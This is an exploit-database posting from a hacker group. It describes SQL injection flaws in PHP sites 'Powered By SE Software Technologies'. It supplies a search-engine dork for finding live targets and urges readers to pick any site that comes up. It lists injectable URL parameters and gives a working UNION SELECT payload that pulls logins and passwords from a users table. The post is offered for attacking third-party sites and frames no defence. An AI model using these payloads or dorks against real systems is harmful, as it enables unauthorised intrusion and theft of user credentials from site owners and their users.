#(+)Exploit Title: SE Software Technologies Sensitive Database Disclosure Vulnerability #(+)Author : ^Xecuti0n3r #(+) Date : 26.04.2011 #(+) Hour : 13:37 PM #(+) E-mail : xecuti0n3r()yahoo.com #(+) dork : intext:"Powered By : SE Software Technologies" filetype:php #(+) Category : Web Apps [SQli] 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ____________________________________________________________________ ____________________________________________________________________ Choose any site that comes up when you enter the dork intext:"Powered By : SE Software Technologies" filetype:php in search engine *SQL injection Vulnerability* # [+]http://site.com/files.php?id='5 # [+]http://site.com/files.php?id=[SQLi] # [+]http://site.com/page.php?data='27 # [+]http://site.com/page.php?data=[SQLi] # [+]http://site.com/details.php?product_id='786 # [+]http://site.com/setails.php?product_id=[SQLi] # [+]http://site.com/contactus.php?data='5 # [+]http://site.com/contactus.php?data=[SQLi] #POC: http://site.com/files.php?id=-5 union select 1,group_concat(user_id,0x3a,login,0x3a,password)+from+users-- ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)Exploit Coded by: ^Xecuti0N3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r (+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :) (+)<3 to :Indian Cyber Army & Indishell Crew ##################################################################